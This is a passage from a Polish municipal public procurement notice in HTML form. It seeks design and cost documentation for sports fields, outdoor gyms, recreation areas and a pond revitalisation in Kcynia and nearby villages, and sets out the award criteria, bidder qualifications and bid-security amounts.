wielofunkcyjnego przy szkole Podstawowej w Dziewierzewie: ▪ boisko wielofunkcyjne (piłka ręczna, piłka siatkowa, 2x koszykówka) o nawierzchni poliuretanowej z piłkochwytami i niezbędnym wyposażeniem, ▪ oświetlenie terenu, ▪ pozostałe elementy (mała architektura – ławki dla drużyn, kosze, ogrodzenie, itp.),<br/>b)	w zakresie budowy boiska wielofunkcyjnego przy szkole Podstawowej w Kcyni: ▪ boisko wielofunkcyjne (piłka ręczna, piłka siatkowa, 2x koszykówka) o nawierzchni poliuretanowej z piłkochwytami i niezbędnym wyposażeniem, ▪ oświetlenie terenu, ▪ pozostałe elementy (mała architektura – ławki dla drużyn, kosze, ogrodzenie, itp.), ▪ malowane miasteczko rowerowe,<br/>c)	dla obszaru objętego projektem dot. boiska w Dziewierzewie (cz. 1 przedmiotowego zadania) nie uchwalono miejscowego planu zagospodarowania przestrzennego,<br/>d)	dla obszaru objętego projektem dot. boiska w Kcyni (cz. 2 przedmiotowego zadania) obowiązuje plan miejscowy przyjęty Uchwałą Nr XXXVI/350/2013 Rady Miejskiej w Kcyni z dnia 25 kwietnia 2013 r. w sprawie miejscowego planu zagospodarowania przestrzennego na terenie miasta Kcynia, ograniczonego ulicą Wyrzyską i Witosa (Dz. Urz. Woj. Kuj. – Pom. z 2013 r. poz. 2004),<br/>e)	niezależnie od powyższych informacji Zamawiający wykluczyć, że w toku konsultacji pojawią się konieczne do wykonania elementy dokumentacji projektowej, których obecnie nie przewiduje – może to wynikać w szczególności z przyczyn technicznych czy funkcjonalnych,<br/>f)	oferowana cena wykonania zamówienia publicznego w przedmiotowym zadaniu ma charakter ryczałtowy i nie podlega zmianie. Oznacza to, że Wykonawca, bazując na swojej wiedzy fachowej oraz doświadczeniu powinien uwzględnić wszystkie możliwe elementy, które mogą mieć wpływ na koszt wykonania zamówienia; powinien zatem przeanalizować nie tyko charakter terenu (w tym okolicznej infrastruktury, w szczególności budynku szkoły), ale również czas jego powstania i wynikające z tego konsekwencje; zamówienie dotyczy opracowania dokumentacji projektowo-kosztorysowej wraz z uzyskaniem pozwolenia na budowę; wszystkie niezbędne do tego celu materiały, w szczególności: mapy, opinie, uzgodnienia, ekspertyzy, w tym wszelkie koszty związane z uzyskaniem ewentualnych odstępstw, powinny być skalkulowane i uwzględnione w przedstawionej ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowych dla 4 oddzielnych inwestycji (= zadanie podzielone na 4 cz.) pn.: „Budowa siłowni plenerowych w Chwaliszewie, Karmelicie, Szczepicach i Tupadłach”, uwzględniająca poniższe warunki:<br/>a)	lokalizacja obiektów: siłowni plenerowej w Chwaliszewie – w pobliżu istniejącej sali gimnastycznej i boiska sportowego, na działce o numerze ewidencyjnym 30/3 obręb Chwaliszewo / siłowni plenerowej w Karmelicie – w pobliżu istniejącej świetlicy wiejskiej, na działce o numerze ewidencyjnym 423/31 obręb Karmelita / siłowni plenerowej w Szczepicach – w pobliżu istniejącej świetlicy wiejskiej, na działkach o numerach ewidencyjnych 279/39 oraz 279/40 / siłowni plenerowej w Tupadłach – w pobliżu istniejącej świetlicy na działce o numerze ewidencyjnym 14/49 obręb Tupadły,<br/>b)	w zakresie budowy siłowni plenerowej w Chwaliszewie: ▪ około 6 urządzeń plenerowych, tablica z regulaminem, ławki oraz mała architektura, ▪ szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych z miejscowym sołtysem – organizowanych w trakcie wykonywania przedmiotowej umowy, ▪ UWAGA: dla obszaru objętego projektem nie uchwalono miejscowego planu zagospodarowania przestrzennego,<br/>c)	w zakresie budowy siłowni plenerowej w Karmelicie: ▪ około 6 urządzeń plenerowych, tablica z regulaminem, ławki oraz mała architektura, ▪ szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych z miejscowym sołtysem – organizowanych w trakcie wykonywania przedmiotowej umowy, ▪ UWAGA: dla obszaru objętego projektem nie uchwalono miejscowego planu zagospodarowania przestrzennego,<br/>d)	w zakresie budowy siłowni plenerowej w Szczepicach: ▪ około 6 urządzeń plenerowych, tablica z regulaminem, ławki oraz mała architektura, ▪ szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych z miejscowym sołtysem – organizowanych w trakcie wykonywania przedmiotowej umowy, ▪ UWAGA: dla obszaru objętego projektem nie uchwalono miejscowego planu zagospodarowania przestrzennego,<br/>e)	w zakresie budowy siłowni plenerowej w Tupadłach: ▪ około 3 urządzenia plenerowe, tablica z regulaminem, ławki oraz mała architektura, ▪ szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych z miejscowym sołtysem – organizowanych w trakcie wykonywania przedmiotowej umowy, ▪ UWAGA: dla obszaru objętego projektem nie uchwalono miejscowego planu zagospodarowania przestrzennego, ale na części przedmiotowego terenu obowiązuje strefa „B” ochrony konserwatorskiej,<br/>f)	niezależnie od powyższych informacji Zamawiający wykluczyć, że w toku konsultacji pojawią się konieczne do wykonania elementy dokumentacji projektowej, których obecnie nie przewiduje – może to wynikać w szczególności z przyczyn technicznych czy funkcjonalnych,<br/>g)	oferowana cena wykonania zamówienia publicznego w przedmiotowym zadaniu ma charakter ryczałtowy i nie podlega zmianie. Oznacza to, że Wykonawca, bazując na swojej wiedzy fachowej oraz doświadczeniu powinien uwzględnić wszystkie możliwe elementy, które mogą mieć wpływ na koszt wykonania zamówienia; powinien zatem przeanalizować nie tyko charakter terenu, ale również czas jego powstania i wynikające z tego konsekwencje; zamówienie dotyczy opracowania dokumentacji projektowo-kosztorysowej wraz z uzyskaniem pozwolenia na budowę; wszystkie niezbędne do tego celu materiały, w szczególności: mapy, opinie, uzgodnienia, ekspertyzy, w tym wszelkie koszty związane z uzyskaniem ewentualnych odstępstw, powinny być skalkulowane i uwzględnione w przedstawionej ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowych dla 3 oddzielnych inwestycji (= zadanie podzielone na 3 cz.) pn.: „Budowa urządzeń małej architektury, strefy wypoczynkowo – rekreacyjnej i kalisteniki”, uwzględniająca poniższe warunki:<br/>a)	lokalizacja obiektów: obiektów małej architektury w Piotrowie (Kowalewko) – w pobliżu świetlicy w Piotrowie, na działkach o numerze ewidencyjnym 324/8 i 324/5 / strefy wypoczynkowo – rekreacyjnej – działka o nr ewidencyjnym 177/5, obręb Kcynia miasto / kalisteniki – przy ul. Powstańców Wielkopolskich w Kcyni, na działce o numerze ewidencyjnym 699/4, obręb Kcynia miasto,<br/>b)	w zakresie budowy obiektów małej architektury w Piotrowie (Kowalewko): ▪ stolik szachowy, stół do ping-ponga, ▪ szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych z miejscowym sołtysem – organizowanych w trakcie wykonywania przedmiotowej umowy, ▪ UWAGA: dla obszaru objętego projektem nie uchwalono miejscowego planu zagospodarowania przestrzennego, a dla terenu objętego projektem nie wydano decyzji o warunkach zabudowy ani decyzji o lokalizacji inwestycji celu publicznego, jednak dla przedmiotowego terenu obowiązuje strefa „B” ochrony konserwatorskiej oraz strefa „E” ochrony konserwatorskiej,<br/>c)	w zakresie budowy strefy wypoczynkowo – rekreacyjnej przy ul. Bolesława Pobożnego w Kcyni: ▪ utwardzenie nawierzchni, przejścia / dojścia z kostki brukowej oraz z nawierzchni bezpiecznej, tereny zielone, mała architektura (w szczególności: ławki, kosze, stojak na rowery, urządzenia siłowni plenerowej, urządzenia małej architektury dla dzieci, ogrodzenie), ▪ szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych organizowanych w trakcie wykonywania przedmiotowej umowy, ▪ UWAGA: dla obszaru objętego projektem nie uchwalono miejscowego planu zagospodarowania przestrzennego, a dla terenu objętego projektem nie wydano decyzji o warunkach zabudowy ani decyzji o lokalizacji inwestycji celu publicznego, jednak dla przedmiotowego terenu obowiązuje strefa „E” ochrony konserwatorskiej oraz strefa „W” ochrony archeologicznej,<br/>d)	w zakresie budowy kalisteniki przy boisku przy ul. Powstańców Wielkopolskich w Kcyni: ▪ zestaw poręczy z przystosowaniem i normami, ▪ szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych organizowanych w trakcie wykonywania przedmiotowej umowy, ▪ UWAGA: dla obszaru objętego projektem nie uchwalono miejscowego planu zagospodarowania przestrzennego, a dla terenu objętego projektem nie wydano decyzji o warunkach zabudowy ani decyzji o lokalizacji inwestycji celu publicznego, jednak dla przedmiotowego terenu obowiązuje strefa „E” ochrony konserwatorskiej oraz strefa „W” ochrony archeologicznej,<br/>e)	niezależnie od powyższych informacji Zamawiający wykluczyć, że w toku konsultacji pojawią się konieczne do wykonania elementy dokumentacji projektowej, których obecnie nie przewiduje – może to wynikać w szczególności z przyczyn technicznych czy funkcjonalnych,<br/>f)	oferowana cena wykonania zamówienia publicznego w przedmiotowym zadaniu ma charakter ryczałtowy i nie podlega zmianie. Oznacza to, że Wykonawca, bazując na swojej wiedzy fachowej oraz doświadczeniu powinien uwzględnić wszystkie możliwe elementy, które mogą mieć wpływ na koszt wykonania zamówienia; powinien zatem przeanalizować nie tyko charakter terenu, ale również czas jego powstania i wynikające z tego konsekwencje; zamówienie dotyczy opracowania dokumentacji projektowo-kosztorysowej wraz z uzyskaniem pozwolenia na budowę; wszystkie niezbędne do tego celu materiały, w szczególności: mapy, opinie, uzgodnienia, ekspertyzy, w tym wszelkie koszty związane z uzyskaniem ewentualnych odstępstw, powinny być skalkulowane i uwzględnione w przedstawionej ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowych dla inwestycji pn.: „Rewitalizacja stawu wraz z zagospodarowaniem przyległego terenu”, uwzględniającą poniższe warunki:<br/>a)	lokalizacja obiektów: staw zlokalizowany jest przy ul. Bolesława Pobożnego w Kcyni, na działce o numerze ewidencyjnym 838/2, <br/>b)	usunięcie zakrzaczeń, niwelacja terenu, wycinka drzew, zagospodarowanie terenów zielonych, nasadzenia, pomost, ławki i stanowisk wędkarskich,<br/>c)	szczegółowy zakres dokumentacji projektowej określany podczas konsultacji i spotkań roboczych organizowanych w trakcie wykonywania przedmiotowej umowy,<br/>d)	dla obszaru objętego projektem nie uchwalono miejscowego planu zagospodarowania przestrzennego, a dla terenu objętego projektem nie wydano decyzji o warunkach zabudowy ani decyzji o lokalizacji inwestycji celu publicznego, jednak dla przedmiotowego terenu obowiązuje strefa „B” ochrony konserwatorskiej,<br/>e)	niezależnie od powyższych informacji Zamawiający wykluczyć, że w toku konsultacji pojawią się konieczne do wykonania elementy dokumentacji projektowej, których obecnie nie przewiduje – może to wynikać w szczególności z przyczyn technicznych czy funkcjonalnych,<br/>f)	oferowana cena wykonania zamówienia publicznego w przedmiotowym zadaniu ma charakter ryczałtowy i nie podlega zmianie. Oznacza to, że Wykonawca, bazując na swojej wiedzy fachowej oraz doświadczeniu powinien uwzględnić wszystkie możliwe elementy, które mogą mieć wpływ na koszt wykonania zamówienia; powinien zatem przeanalizować nie tyko charakter terenu, ale również czas jego powstania i wynikające z tego konsekwencje; zamówienie dotyczy opracowania dokumentacji projektowo-kosztorysowej wraz z uzyskaniem pozwolenia na budowę; wszystkie niezbędne do tego celu materiały, w szczególności: mapy, opinie, uzgodnienia, ekspertyzy, w tym wszelkie koszty związane z uzyskaniem ewentualnych odstępstw, powinny być skalkulowane i uwzględnione w przedstawionej ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki określone na podstawie art. 112 ustawy oraz nie mogą podlegać wykluczeniu z postępowania:<br/>a)	z powodu okoliczności określonych w art. 108 ustawy,<br/>b)	z powodu okoliczności określonych w art. 109 ust. 1 pkt 1, 4, 5, 7 i 8 ustawy,<br/>c)	na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.p.: Dz.U.2022.835).<br/>2.	Wykonawcy ubiegający się o udzielenie zamówienia muszą:<br/>a)	posiadać zdolność do występowania w obrocie gospodarczym, tj.:<br/>-	być zarejestrowanymi we właściwym rejestrze lub w centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do takiego rejestru lub takiej ewidencji;<br/>b)	posiadać uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, tj. każda z osób wyznaczonych przez Wykonawcę do realizacji przedmiotowego zamówienia (bądź Wykonawca samodzielnie) winna posiadać:<br/>-	uprawnienia do sporządzania projektów w zakresie branży obejmującej zakres opracowania realizowanego przez tę osobę (bądź przez Wykonawcę samodzielnie),<br/>-	aktualny wpis na listę członków Okręgowej Izby Inżynierów Budownictwa (bądź organizacji tożsamej),<br/>c)	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.:<br/>-	być ubezpieczonym od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość sumy ubezpieczenia nie mniejszą niż 100 000,00 zł;<br/>d)	posiadać zdolność techniczną lub zawodową, tj.:<br/>-	wykazać należyte (bez wad, opóźnienia i zgodnie z umową) wykonanie równoważnych zamówień w ilości nie mniejszej niż 2 (dwa) w ciągu ostatnich 3 (trzech) lat (ilość zamówień należy rozumieć jako liczbę zawartych umów na wykonanie projektu budowy / przebudowy / rozbudowy / modernizacji / remontu / rewitalizacji budynku / obiektu tożsamego ze stanowiącym(i) przedmiot zamówienia, na który Wykonawca składa swoją ofertę), których parametry / cechy / rozmiary / wielkość były nie gorsze / mniejsze niż wskazane w Opisie przedmiotu zamówienia dla zadania, na które Wykonawca składa swoją ofertę – za zamówienia równoważne Zamawiający uzna wykonanie projektów dot. ww. obiektów o parametrach nie mniejszej od wynikającej z powyższego zastrzeżenia;<br/>-	dysponować nie mniej niż 1 osobą posiadającą uprawnienia do projektowania w każdej z branż związanych z projektowanymi inwestycjami (jeżeli dotyczy – patrz: przypisy), tj.:<br/>	Kierownik Zespołu Projektowego – projektant w branży konstrukcyjno-budowlanej : osoba posiadająca: ▪ uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń (bądź tożsame / równoważne), ▪ co najmniej 3 lata doświadczenia zawodowego jako projektant, w tym zrealizowanie we wskazanym okresie: co najmniej 2 (dwóch) projektów budowlanych (wykonawczych / budowlano-wykonawczych), których przedmiotem była budowa / rozbudowa / przebudowa / modernizacja / remont / rewitalizacja budynku / obiektu tożsamego ze stanowiącym(i) przedmiot zamówienia, na który Wykonawca składa swoją ofertę, <br/>	Projektant w branży sanitarnej : osoba posiadająca: ▪ uprawnienia budowlane do projektowania we wskazanej branży (bądź tożsame / równoważne), ▪ co najmniej 2 lata doświadczenia zawodowego jako projektant,<br/>	Projektant w branży elektrycznej : osoba posiadająca: ▪ uprawnienia budowlane do projektowania we wskazanej branży (bądź tożsame / równoważne), ▪ co najmniej 2 lata doświadczenia zawodowego jako projektant.<br/>3.	Ocena spełnienia warunków określonych w ppkt. 2 zostanie przez Zamawiającego dokonana poprzez analizę dokumentów, określonych w pkt. X niniejszego Rozdziału SWZ, złożonych przez Wykonawców na wezwanie Zamawiającego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o braku przynależności do grupy kapitałowej (Załącznik nr 3) – w celu potwierdzenia spełnienia wymagania z pkt. VII ppkt 1 niniejszego Rozdziału SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną w pkt. IX ppkt 2 lit. c niniejszego Rozdziału SWZ – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 2 lit. c Rozdziału I SWZ;<br/>2)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie (Załącznik nr 5) – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 2 lit. d Rozdziału I SWZ;<br/>Dowodami, o których mowa w pkt. 2, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. <br/>W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>3)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 6) – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 2 lit. b oraz lit. d Rozdziału I SWZ;<br/>Doświadczenie, o którym mowa w pkt. 3, należy wykazać poprzez odwołanie się w załączniku nr 6 do wykonanych dokumentacji projektowych wymienionych w załączniku nr 5 – jeżeli były wykonane przez wskazanego projektanta (wyznaczonego na kierownika zespołu projektowego) bądź poprzez wskazanie min. dwóch innych wykonanych dokumentacji projektowych, które ta osoba wykonała.<br/>d)	oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 2 lit. d Rozdziału I SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości:<br/>a)	w zadaniu nr 1 – Rozbudowa i przebudowa świetlicy wiejskiej w Dobieszewie: 650,00 zł (słownie: sześćset pięćdziesiąt złotych),<br/>b)	w zadaniu nr 2 – Rozbudowa i remont łazienek w Szkole Podstawowej w Mycielewie: 500,00 zł (słownie: pięćset złotych),<br/>c)	w zadaniu nr 3 – Budowa sali widowiskowej (…) przy ul. Libelta w Kcyni: 1 400,00 zł (słownie: tysiąc czterysta złotych),<br/>d)	w zadaniu nr 4 – Budowa kontenerowego zaplecza sanitarno-socjalnego na boisku (…): 1 600,00 zł (słownie: tysiąc sześćset złotych),<br/>e)	w zadaniu nr 5 – Budowa boisk przy szkołach podstawowych (…): 1 000,00 zł (słownie: tysiąc złotych),<br/>f)	w zadaniu nr 6 – Budowa siłowni plenerowych (…): 200,00 zł (słownie: dwieście złotych),<br/>g)	w zadaniu nr 7 – Budowa urządzeń małej architektury, strefy wypoczynkowo – rekreacyjnej i kalisteniki: 150,00 zł (słownie: sto pięćdziesiąt złotych),<br/>h)	w zadaniu nr 8 – Rewitalizacja stawu wraz z zagospodarowaniem przyległego terenu: 70,00 zł (słownie: siedemdziesiąt złotych).<br/>2.	Wadium może być wniesione w:<br/>a)	pieniądzu,<br/>b)	gwarancjach bankowych,<br/>c)	gwarancjach ubezpieczeniowych,<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.2020.299 t.j.).<br/>3.	Wadium w pieniądzu winno zostać wniesione przelewem na rachunek bankowy Zamawiającego. O wniesieniu wadium w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego, tj. uznania rachunku Zamawiającego, która musi nastąpić przed terminem składania ofert.<br/>4.	Przelewu należy dokonać na rachunek bankowy podany w pkt I ppkt 2 niniejszego Rozdziału SWZ.<br/>5.	Na poleceniu przelewu (blankiecie wpłaty) należy podać tytuł przelewu: „Wadium przetargowe – RI.271.1.603141.2022 – zadanie(a) nr …” oraz podać informację o numerze rachunku bankowego Wykonawcy, na które ma zostać dokonany zwrot wadium (w szczególności w sytuacji, jeśli jest inny niż ten, z którego nastąpił przelew).<br/>6.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>a)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie,<br/>b)	z jego treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium,<br/>c)	winno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie Zamawiającego,<br/>d)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień 